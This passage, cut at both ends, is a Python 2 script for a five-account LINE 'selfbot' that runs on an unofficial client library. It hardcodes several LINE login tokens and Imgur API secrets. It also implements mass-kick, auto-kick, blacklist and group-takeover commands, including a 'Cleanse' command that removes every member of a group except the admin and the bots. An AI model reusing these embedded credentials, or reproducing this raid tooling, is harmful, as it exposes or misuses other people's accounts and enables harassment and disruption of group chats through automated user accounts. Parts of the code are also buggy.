ki.login(token="EkRQbZZErjrx5uujDyza.84BapPm+V0nuPZ1PkEq6/G.V3aSBbMrbByVhVmOx9yrMp4S7FTJqw6cetH43/pOLEA=")
ki.loginResult()
kc = LineAlpha.LINE()
kc.login(token="EkZvZ7Hlj7m84MOx8yI1.O00VsLTlmX6iq84iusWZ4q.ScFSA8A8Qsbfp5hguvZI5/MZ3JkFwkM9PIvGyqC7Pi4=")
kc.loginResult()
kg = LineAlpha.LINE()
kg.login(token="EkpaxWwnqie6I5luusg7.St9fkz8GgIrWBhX+pEuGrW.Nho5QtsDAstF7T2MmUqC3ogYFUW7nw9yiu58tEARJZQ=")
kg.loginResult()
adm = cl
# adm = LineAlpha.LINE()
# adm.login(token="EkoRa4LbxQLepMyWmEMe.idD7rqcO/flZ+HSQWA/z7G.Z0Nd273uZOb1aD1eeTNA0FVr1/dN5ja7KuqCAyZlQFg=")
# adm.loginResult()
client_id = '511abc94ee71658'
client_secret = '948a2fcdbf566c04bcce5f990e349ce795ee7460'
access_token = '30181acf5583ad6a215b4f69e6e5c7bc5c66efdb'
refresh_token = '4a6b3f983b96714c2e9b581edf86f86e0d681938'
client = ImgurClient(client_id, client_secret, access_token, refresh_token)
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
album = None
image_path = 'tmp/tmp.jpg'
# kk=ki=kc=cl
helpMessage ="""[Ardh-] Bot(s)
Use Prefix 「Ar」 to use the Bot(s)
Prefix is Case sensitive but the commands is not.
[Gid] - Show Group ID
[Mid all] - Show all the Bot(s) MID
[Bot 1/2/3/4/5] - Shows the specific Bot MID
[Bot all] - Show all the Bot(s) Contact
[Bot 1/2/3/4/5] - Shows the specific Bot Contact
[Yid] - Show your ID
[Contact 「mid」] - Give Contact by MID
[Join on/off] - Auto join group
[Leave on/off] - Allows the bot to leave the group
[*] Command in the groups [*]
[Ginfo] - Group Info
[Banlist] - Check Banlist
[Cancel] - Cancel all pending(s) invitation
[Stalk 「ID」] - Upload lastest instagram picture from ID
[*] Admin and Staff Commands [*]
[Absen] - Check if bot is Online
[Glink on/off] - Turn invitation link for group on/off
[Cancel on/off] - Turn auto cancel invite on/off
[Gn 「group name」] - Change Group Name
[Sp/Speed] - Check bot response speed
[Random:「A」] - Randomize group name A times
[Bc 「text」] - Let the bot send a text
[*] Admin only Commands [*]
[Cleanse] - Clear all members in the group
[Bye all] - Bot Leave
[Ban 「@」] - Ban By Tag
[Unban 「@」] - Unban By Tag
[Ban] - By Sharing Contact
[Unban] - By Sharing Contact
[Kill ban] - Kick all banned contact(s)
[Staff add/remove @] - Add or Remove Staff By Tag
"""
KAC=[cl,ki,kk,kc,kg]
mid = cl.getProfile().mid
Amid = kk.getProfile().mid
Bmid = ki.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = kg.getProfile().mid
Bots = [mid,Amid,Bmid,Cmid,Dmid]
admin = ["u20377b4500a8f852f3fe1b2ac1af99ee"]
staff = ["u20377b4500a8f852f3fe1b2ac1af99ee"]
adminMID = "u20377b4500a8f852f3fe1b2ac1af99ee"
wait = {
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":True,
"cName":"[Ardh-]BOT1",
"cName2":"[Ardh-]BOT2",
"cName3":"[Ardh-]BOT3",
"cName4":"[Ardh-]BOT4",
"cName5":"[Ardh-]BOT5",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protectionOn":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
cancelinvite = {
'autoCancel':True,
'autoCancelUrl':True
}
bot1_name = {
"1" : "[Ardh-]BOT1",
"2" : "Ardh-]BOT1[",
"3" : "rdh-]BOT1[A",
"4" : "dh-]BOT1[Ar",
"5" : "h-]BOT1[Ard",
"6" : "-]BOT1[Ardh",
"7" : "]BOT1[Ardh-",
"8" : "BOT1[Ardh-]",
"9" : "OT1[Ardh-]B",
"10" : "T1[Ardh-]BO",
"11" : "1[Ardh-]BOT"
}
bot2_name = {
"1" : "[Ardh-]BOT2",
"2" : "Ardh-]BOT2[",
"3" : "rdh-]BOT2[A",
"4" : "dh-]BOT2[Ar",
"5" : "h-]BOT2[Ard",
"6" : "-]BOT2[Ardh",
"7" : "]BOT2[Ardh-",
"8" : "BOT2[Ardh-]",
"9" : "OT2[Ardh-]B",
"10" : "T2[Ardh-]BO",
"11" : "2[Ardh-]BOT"
}
bot3_name = {
"1" : "[Ardh-]BOT3",
"2" : "Ardh-]BOT3[",
"3" : "rdh-]BOT3[A",
"4" : "dh-]BOT3[Ar",
"5" : "h-]BOT3[Ard",
"6" : "-]BOT3[Ardh",
"7" : "]BOT3[Ardh-",
"8" : "BOT3[Ardh-]",
"9" : "OT3[Ardh-]B",
"10" : "T3[Ardh-]BO",
"11" : "3[Ardh-]BOT"
}
bot4_name = {
"1" : "[Ardh-]BOT4",
"2" : "Ardh-]BOT4[",
"3" : "rdh-]BOT4[A",
"4" : "dh-]BOT4[Ar",
"5" : "h-]BOT4[Ard",
"6" : "-]BOT4[Ardh",
"7" : "]BOT4[Ardh-",
"8" : "BOT4[Ardh-]",
"9" : "OT4[Ardh-]B",
"10" : "T4[Ardh-]BO",
"11" : "4[Ardh-]BOT"
}
bot5_name = {
"1" : "[Ardh-]BOT5",
"2" : "Ardh-]BOT5[",
"3" : "rdh-]BOT5[A",
"4" : "dh-]BOT5[Ar",
"5" : "h-]BOT5[Ard",
"6" : "-]BOT5[Ardh",
"7" : "]BOT5[Ardh-",
"8" : "BOT5[Ardh-]",
"9" : "OT5[Ardh-]B",
"10" : "T5[Ardh-]BO",
"11" : "5[Ardh-]BOT"
}
setTime = {}
setTime = wait2['setTime']
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
# Here's the metadata for the upload. All of these are optional, including
# this config dict itself.
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 11:
if cancelinvite["autoCancelUrl"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
print "Url Opened, Autokick on"
else:
print "random group update"
else:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
kk.acceptGroupInvitation(op.param1)
print "BOT 2 Joined"
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
ki.acceptGroupInvitation(op.param1)
print "BOT 3 Joined"
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
kc.acceptGroupInvitation(op.param1)
print "BOT 4 Joined"
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
kg.acceptGroupInvitation(op.param1)
else:
if cancelinvite["autoCancel"] == True:
try:
X = cl.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(op.param1, gInviMids)
print gInviMids + "invite canceled"
except:
try:
print "Retry canceling invitation"
X = random.choice(KAC).getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gInviMids)
print gInviMids + "invite canceled"
except:
print "Bot can't cancel the invitation"
pass
if op.type == 15:
random.choice(KAC).sendText(op.param1, "Good Bye :)")
print op.param3 + "has left the group"
if op.type == 17:
if op.param3 in wait["blacklist"]:
try:
cl.kickoutFromGroup(op.param1, op.param3)
except:
random.choice(KAC).kickoutFromGroup(op.param1, op.param3)
if op.type == 19:
print "someone was kicked"
if op.param3 in admin:
print "Admin has been kicked"
if op.param2 in Bots:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,op.param3)
adm.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
adm.acceptGroupInvitation(op.param1)
print "Admin Joined"
if mid in op.param3:
print "BOT1 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kk.inviteIntoGroup(op.param1,op.param3)
cl.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
cl.acceptGroupInvitation(op.param1)
print "BOT1 Joined"
if Amid in op.param3:
print "BOT2 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
ki.inviteIntoGroup(op.param1,op.param3)
kk.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kk.acceptGroupInvitation(op.param1)
print "BOT2 Joined"
if Bmid in op.param3:
print "BOT3 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kc.inviteIntoGroup(op.param1,op.param3)
ki.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
ki.acceptGroupInvitation(op.param1)
print "BOT3 Joined"
if Cmid in op.param3:
print "BOT4 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
kg.inviteIntoGroup(op.param1,op.param3)
kc.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kc.acceptGroupInvitation(op.param1)
print "BOT4 Joined"
if Dmid in op.param3:
print "BOT5 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,op.param3)
kg.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).inviteIntoGroup(op.param1,op.param3)
kg.acceptGroupInvitation(op.param1)
print "BOT5 Joined"
else:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
kg.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "autokick executed"
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
print "BOT(s) Leaving chat Room"
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
print "BOT(s) Leaving chat Room"
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in the Blacklist")
wait["wblacklist"] = False
print "MID Already in the Blacklist"
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to the Blacklist")
print [msg.contentMetadata["mid"]] + " Added to the Blacklist"
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted from the Blacklist")
wait["dblacklist"] = False
print [msg.contentMetadata["mid"]] + " Removed from the Blacklist"
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Contact not in Blacklist")
print "MID not in blacklist"
elif wait["contact"] == True:
if msg.from_ in admin:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[Display Name]:\n" + msg.contentMetadata["displayName"] + "\n\n[MID]:\n" + msg.contentMetadata["mid"] + "\n\n[Status Message]:\n" + contact.statusMessage + "\n\n[Profile Picture]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n[Cover Picture]:\n" + str(cu))
print "Contact sent"
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n\n[MID]:\n" + msg.contentMetadata["mid"] + "\n\n[Status Message]:\n" + contact.statusMessage + "\n\n[Profile Picture]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n[Cover Picture]:\n" + str(cu))
print "Contact sent"
#-----------------------[Help Section]------------------------
elif msg.text in ["Ar /help","Ar /Help"]:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,helpMessage)
print "[Command]/help executed"
else:
cl.sendText(msg.to,helpt)
#-----------------------[Group Name Section]------------------------
elif "Ar Gn " in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Ar Gn ","")
random.choice(KAC).updateGroup(X)
print "[Command]Gn executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
cl.sendText(msg.to,"It can't be used besides the group.")
print "Gn executed outside group chat"
elif "Ar gn " in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Ar gn ","")
random.choice(KAC).updateGroup(X)
print "[Command]Gn executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
cl.sendText(msg.to,"It can't be used besides the group.")
print "Gn executed outside group chat"
#-----------------------[Kick Section]------------------------
elif "Ar Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Ar Kick ","")
cl.sendText(msg.to,"Good bye.")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
print "[Command]Kick executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "Ar kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Ar kick ","")
cl.sendText(msg.to,"Good bye.")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
print "[Command]Kick executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Kill ban","Ar kill ban"]:
if msg.toType == 2:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
if matched_list != []:
cl.sendText(msg.to,"Blacklisted contact noticed...")
cl.sendText(msg.to,"Begin Kicking contact")
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"It looks empty here.")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
print "[Command]Kill ban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Send Profile Section]------------------------
elif msg.text in ["Ar Bot all","Ar bot all"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': Amid}
kk.sendMessage(msg)
msg.contentMetadata = {'mid': Bmid}
ki.sendMessage(msg)
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentMetadata = {'mid': Dmid}
kg.sendMessage(msg)
print "[Command]Bot all executed"
elif msg.text in ["Ar Bot 1","Ar bot 1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
print "[Command]Bot 1 executed"
elif msg.text in ["Ar Bot 2","Ar bot 2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
kk.sendMessage(msg)
print "[Command]Bot 2 executed"
elif msg.text in ["Ar Bot 3","Ar bot 3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki.sendMessage(msg)
print "[Command]Bot 3 executed"
elif msg.text in ["Ar Bot 4","Ar bot 4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
print "[Command]Bot 4 executed"
elif msg.text in ["Ar Bot 5","Ar bot 5"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
kg.sendMessage(msg)
print "[Command]Bot 5 executed"
#-----------------------[Cancel invitation Section]------------------------
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
cl.sendText(msg.to,"Canceling all pending(s) invitation")
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
print "[Command]Cancel executed"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"This group doesn't have any pending invitation")
print "[Command]Group don't have pending invitation"
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "Cancel executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Group link Section]------------------------
elif msg.text in ["Ar Glink off","Ar Link off","Ar glink off","Ar link off"]:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation link turned off")
print "[Command]Glink off executed"
else:
cl.sendText(msg.to,"Already turned off")
print "[Command]Glink off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Glink off executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Ar Glink on","Ar Link on","Ar glink on","Ar link on"]:
if msg.toType == 2:
if msg.from_ in staff:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation link turned on")
print "[Command]Glink on executed"
else:
cl.sendText(msg.to,"Already turned on")
print "[Command]Glink on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Glink on executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Group info Section]------------------------
elif msg.text in ["Ar Ginfo","Ar ginfo"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
print "[Command]Ginfo executed"
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
print "[Command]Ginfo executed"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
print "[Command]Ginfo executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[Bot/User/Group ID Section]------------------------
elif msg.text in ["Ar Gid","Ar gid"]:
cl.sendText(msg.to,msg.to)
print "[Command]Gid executed"
elif msg.text in ["Ar Mid all","Ar mid all"]:
cl.sendText(msg.to,"[Ardh-]Bot(s) ID\n[Ardh-]BOT1\n" + mid + "\n\n[Ardh-]BOT2\n" + Amid + "\n\n[Ardh-]BOT3\n" + Bmid + "\n\n[Ardh-]BOT4\n" + Cmid + "\n\n[Ardh-]BOT5\n" + Dmid)
print "[Command]Mid executed"
elif msg.text in ["Ar Mid 1","Ar mid 1"]:
cl.sendText(msg.to,mid)
print "[Command]Mid 1 executed"
elif msg.text in ["Ar Mid 2","Ar mid 2"]:
kk.sendText(msg.to,Amid)
print "[Command]Mid 2 executed"
elif msg.text in ["Ar Mid 3","Ar mid 3"]:
ki.sendText(msg.to,Bmid)
print "[Command]Mid 3 executed"
elif msg.text in ["Ar Mid 4","Ar mid 4"]:
kc.sendText(msg.to,Cmid)
print "[Command]Mid 4 executed"
elif msg.text in ["Ar Mid 5","Ar mid 5"]:
kc.sendText(msg.to,Dmid)
print "[Command]Mid 5 executed"
elif msg.text in ["Ar Yid","Ar yid"]:
cl.sendText(msg.to,msg.from_)
print "[Command]Yid executed"
#-----------------------[Send Contact Section]------------------------
elif "Ar Contact" in msg.text:
mmid = msg.text.replace("Ar Contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
print "[Command]Contact executed"
elif "Ar contact" in msg.text:
mmid = msg.text.replace("Ar contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
print "[Command]Contact executed"
#-----------------------[Auto Join Section]------------------------
elif msg.text in ["Ar Join on","Ar join on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join already on")
print "[Command]Join on executed"
else:
cl.sendText(msg.to,"Auto join already on")
print "[Command]Join on executed"
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join turned on")
print "[Command]Join on executed"
else:
cl.sendText(msg.to,"Auto join turned on")
print "Join on executed"
elif msg.text in ["Ar Join off","Ar join off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join already off")
print "[Command]Join off executed"
else:
cl.sendText(msg.to,"Auto join already off")
print "[Command]Join off executed"
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto join turned off")
print "[Command]Join off executed"
else:
cl.sendText(msg.to,"Auto join turned off")
print "[Command]Join off executed"
#-----------------------[Group Url Section]------------------------
elif msg.text in ["Ar Gurl","Ar gurl"]:
if msg.toType == 2:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
print "[Command]Gurl executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
print "[Command]Gurl executed outside group chat"
else:
cl.sendText(msg.to,"Not for use less than group")
#-----------------------[All bots join group Section]------------------------
elif msg.text in ["Ar Join all","Ar join all"]:
if msg.from_ in admin:
try:
ginfo = cl.getGroup(msg.to)
ginfo.preventJoinByTicket = False
cl.updateGroup(ginfo)
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
kg.acceptGroupInvitationByTicket(msg.to,Ticket)
ginfo = random.choice(KAC).getGroup(msg.to)
ginfo.preventJoinByTicket = True
random.choice(KAC).updateGroup(ginfo)
except:
print "Somethings wrong with the url"
print "[Command]Join all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Bot(s) Leave Section]------------------------
elif msg.text in ["Ar Bye all","Ar bye all"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
kg.leaveGroup(msg.to)
except:
pass
print "[Command]Bye all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 1","Ar bye bot 1"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 1 executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 2","Ar bye bot 2"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kk.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 2 executed"
else:
kk.sendText(msg.to,"Command denied.")
kk.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 3","Ar bye bot 3"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = ki.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 3 executed"
else:
ki.sendText(msg.to,"Command denied.")
ki.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 4","Ar bye bot 4"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kc.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 4 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Bye bot 5","Ar bye bot 5"]:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = kc.getGroup(msg.to)
try:
kg.leaveGroup(msg.to)
except:
pass
print "[Command]Bye bot 5 executed"
else:
kg.sendText(msg.to,"Command denied.")
kg.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Cleanse Section (USE AT YOUR OWN RISK!)]------------------------
elif msg.text in ["Ar Cleanse","Ar cleanse"]:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Cleanse executing"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
kk.sendText(msg.to,"Group cleansing begin")
kc.sendText(msg.to,"Goodbye :)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
# --------------[Bot and Admin MID]----------------
targets.remove(adminMID)
targets.remove(mid)
targets.remove(Amid)
targets.remove(Bmid)
targets.remove(Cmid)
targets.remove(Dmid)
# --------------[Bot and Admin MID]----------------
if targets == []:
ki.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[ki,kk,kc,cl,kg]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleansed")
print "[Command]Cleanse executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
#-----------------------[Ban/Unban Section]------------------------
elif "Ar Ban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Ban executed"
_name = msg.text.replace("Ar Ban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Blacklist")
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Unban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Unban executed"
_name = msg.text.replace("Ar Unban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
